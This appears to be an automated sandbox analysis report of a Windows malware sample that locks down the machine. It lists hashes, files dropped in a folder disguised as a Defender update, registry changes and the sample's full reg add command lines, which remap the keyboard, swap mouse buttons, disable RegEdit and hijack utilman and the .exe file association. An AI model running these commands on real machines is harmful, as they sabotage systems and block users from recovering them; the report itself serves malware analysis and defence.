SHA512 3edee078f8221c4ff1da59215dcc8e2144db74c5679e386645c3c3a34038cc23f11f83ba86efeeb94f3b01ec90dc72d83da1a09c91cb0cb02d8019c5d226b9c4

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png

MD5 4947724257526b4226e21ae7541822cd
SHA1 af4db735de48a5069e70758bdfdf41a8214aa346
SHA256 19fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba
SHA512 52986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png

MD5 2f368b76ab153329fb42db70493474b1
SHA1 4c4752399ee2678f6cf4d67affca9dcba59d0023
SHA256 ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f
SHA512 adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png

MD5 9ef9685c5a578bfdceccaedb0d5fa519
SHA1 713f8621414772eee6602f9fa9ee0a3528d62057
SHA256 6c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746
SHA512 2238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png

MD5 f346c440007285aff13e1e0512608862
SHA1 4b4a44bc30d37c66dea948bd406effc2bcc63775
SHA256 2f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901
SHA512 34fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032

C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png

MD5 1db691b8c60c5f82f3dae2df999c1c7c
SHA1 c252d4a6e065ab5b122f0ae43f6abdbaad49d80e
SHA256 f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d
SHA512 3629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7

C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png

MD5 908587d867cd053293e2106d70cf42f3
SHA1 83ffc3fc7f61d972b41347ff783a29b41bf13087
SHA256 f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444
SHA512 541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8

C:\ProgramData\Microsoft\User Account Pictures\user.bmp

MD5 40e2162dfc51fded60ea7b1de3acf588
SHA1 3c0b932a845027db10e67c47c0c9cd45fa80ecbb
SHA256 d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7
SHA512 453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt

MD5 e3a317c88b65b975be8e1c21e149f16d
SHA1 6e7a24a1146ba2800bf0c56ef5b17ea32b01f019
SHA256 b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0
SHA512 1d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 02:33

Reported

2024-10-18 02:33

Platform

win10v2004-20241007-en

Max time kernel

5s

Max time network

8s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL" C:\Windows\system32\reg.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\__tmp_rar_sfx_access_check_240623921 C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" " C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe C:\Windows\system32\cmd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler" C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command C:\Windows\system32\cmd.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1200 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 1200 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 4752 wrote to memory of 1492 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4752 wrote to memory of 1492 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1492 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1492 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1492 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1492 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1492 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1616 wrote to memory of 4392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1616 wrote to memory of 4392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3084 wrote to memory of 4284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3084 wrote to memory of 4284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3280 wrote to memory of 1504 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3280 wrote to memory of 1504 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3456 wrote to memory of 3992 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3456 wrote to memory of 3992 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2532 wrote to memory of 3760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2532 wrote to memory of 3760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3432 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3432 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3464 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3464 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe

"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000071000000000000010000003b0000003c0000003d0000003e0000003f0000004000000041000000420000004300000044000000570000005800000037e000004600000052e0000047e0000049e0000051e000004fe0000053e0000048e000004be0000050e000004de00000520000005300000051000000500000004f0000004b0000004c0000004d0000004e0000004900000048000000470000004500000035e00000370000004a0000002900000002000000030000000400000005000000060000000700000008000000090000000a0000000b0000000c0000000d0000000f0000001000000011000000130000001600000017000000190000001a0000001b0000002b000000280000002700000026000000250000002400000022000000210000003a0000002a0000001d0000005be00000380000002c0000002d0000002e0000002f0000003000000032000000330000003400000035000000360000001de000005de000005ce0000038e000005900000065e0000021e000006be000005ee000005fe000006ae0000069e0000068e0000067e0000032e000006ce000006de0000066e0000020e000002ee000002ce0000030e0000019e0000010e0000024e0000022e0000000 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

